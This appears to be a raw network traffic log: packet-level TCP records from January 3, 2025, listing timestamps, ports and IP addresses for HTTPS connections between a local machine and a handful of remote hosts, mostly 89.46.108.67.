                                                                                                                                              Jan 3, 2025 17:33:02.430879116 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.431174994 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.431237936 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.431349993 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.443126917 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.443357944 CET49809443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.443419933 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.443803072 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.444077015 CET49809443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.444168091 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.444168091 CET49809443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.452547073 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.452564001 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.452574968 CET498068545192.168.2.163.33.155.121
                                                                                                                                              Jan 3, 2025 17:33:02.452625036 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.452641010 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.452681065 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.466500044 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.466737032 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.466759920 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.467773914 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.467839956 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.468086004 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.468142033 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.468206882 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.468214035 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.474159956 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.474174023 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.474247932 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.474271059 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.474322081 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.475332022 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.475795984 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.475810051 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.475873947 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.475882053 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.475940943 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476119995 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476136923 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476191998 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476198912 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476244926 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476449013 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476465940 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476535082 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476542950 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476594925 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476622105 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476663113 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476680040 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476686001 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476697922 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.476737022 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476763010 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476986885 CET49791443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.476995945 CET4434979189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.481405973 CET49815443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.481437922 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.481515884 CET49815443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.481642008 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.481682062 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.481743097 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.481859922 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.481888056 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.481942892 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482081890 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482091904 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.482144117 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482296944 CET49815443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482306004 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.482429981 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482441902 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.482562065 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482575893 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.482697964 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.482706070 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.484569073 CET49809443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.484596968 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.516568899 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.521908998 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.522105932 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.522125959 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.523003101 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.523075104 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.523307085 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.523379087 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.523395061 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.524678946 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.524840117 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.524849892 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.525141954 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.525422096 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.525473118 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.525494099 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.563587904 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.563607931 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.567332983 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.570004940 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.570209980 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.570221901 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.570511103 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.570760965 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.570816994 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.570853949 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.579559088 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.582834005 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.583141088 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.583157063 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.584122896 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.584212065 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.584588051 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.584644079 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.584769011 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.584774971 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.611560106 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.611569881 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.611608982 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.626597881 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.790656090 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.792273045 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.792354107 CET49809443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.792794943 CET49809443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.792826891 CET4434980989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.831859112 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.831934929 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.831984997 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.832524061 CET49810443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.832539082 CET4434981089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.906717062 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.906738043 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.906744003 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.906770945 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.906791925 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.906832933 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.906866074 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.907291889 CET49811443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.907327890 CET4434981189.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.920300007 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.920320988 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.920336008 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.920412064 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.920433044 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.920494080 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.921526909 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.921541929 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.921607018 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.921617031 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.923135996 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.923198938 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.923203945 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.923253059 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.923393965 CET49807443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.923407078 CET4434980789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.926891088 CET49819443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.926912069 CET4434981989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.926994085 CET49819443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.927242994 CET49819443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.927258015 CET4434981989.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.928400993 CET49820443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.928417921 CET4434982089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.928487062 CET49820443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.928673029 CET49820443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.928685904 CET4434982089.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.935022116 CET49821443192.168.2.16142.250.185.164
                                                                                                                                              Jan 3, 2025 17:33:02.935031891 CET44349821142.250.185.164192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.935086012 CET49821443192.168.2.16142.250.185.164
                                                                                                                                              Jan 3, 2025 17:33:02.935247898 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:02.935286999 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.935338020 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:02.935441017 CET49821443192.168.2.16142.250.185.164
                                                                                                                                              Jan 3, 2025 17:33:02.935451984 CET44349821142.250.185.164192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.935566902 CET49822443192.168.2.1677.88.21.119
                                                                                                                                              Jan 3, 2025 17:33:02.935579062 CET4434982277.88.21.119192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.972908974 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.972929001 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.972937107 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.972990036 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.973015070 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.973026037 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.973047972 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.973078012 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.973090887 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.973090887 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.973103046 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.973123074 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.974375010 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.974397898 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.974440098 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:02.974445105 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:02.974462032 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.020591021 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.026563883 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.026587009 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.026595116 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.026607990 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.026631117 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.026662111 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.026681900 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.026695967 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.026740074 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.027081013 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.027148008 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.027156115 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.027172089 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.027209044 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.027503014 CET49812443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.027510881 CET4434981289.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.030186892 CET49823443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.030220032 CET4434982389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.030306101 CET49823443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.030560970 CET49823443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.030570984 CET4434982389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050755978 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050781965 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050789118 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050812006 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050849915 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050868034 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.050894022 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050909042 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.050930023 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.050942898 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.050971031 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.051625013 CET49813443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.051637888 CET4434981389.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.058298111 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.058541059 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.058549881 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.059480906 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.059587955 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.060072899 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.060126066 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.060400009 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.060405970 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.083787918 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.083798885 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.083848000 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.083911896 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.083931923 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.083960056 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.083985090 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085021019 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.085037947 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.085108042 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085114956 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.085161924 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085500956 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.085573912 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.085576057 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085623026 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085741997 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085756063 CET4434980889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.085764885 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.085808992 CET49808443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.101114035 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.172413111 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.172691107 CET49815443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.172704935 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.172997952 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.173265934 CET49815443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.173310041 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.173382998 CET49815443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.190133095 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.190335989 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.190345049 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.191807985 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.191879034 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.192102909 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.192177057 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.192205906 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.204581976 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.204766989 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.204788923 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.205106020 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.205404043 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.205457926 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.205478907 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.219332933 CET4434981589.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.235348940 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.243576050 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.243582010 CET4434981789.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.251317978 CET4434981889.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.259567022 CET49818443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.291578054 CET49817443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.316936970 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.317184925 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.317203045 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.318090916 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.318186998 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.318449974 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.318502903 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.318588972 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.318598032 CET4434981689.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.371565104 CET49816443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.444077015 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.444097996 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.444155931 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.444176912 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.445677042 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.445729971 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.445806980 CET49814443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.445816994 CET4434981489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.450234890 CET49824443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.450289011 CET4434982489.46.108.67192.168.2.16
                                                                                                                                              Jan 3, 2025 17:33:03.450357914 CET49824443192.168.2.1689.46.108.67
                                                                                                                                              Jan 3, 2025 17:33:03.450751066 CET49825443192.168.2.1689.46.108.67
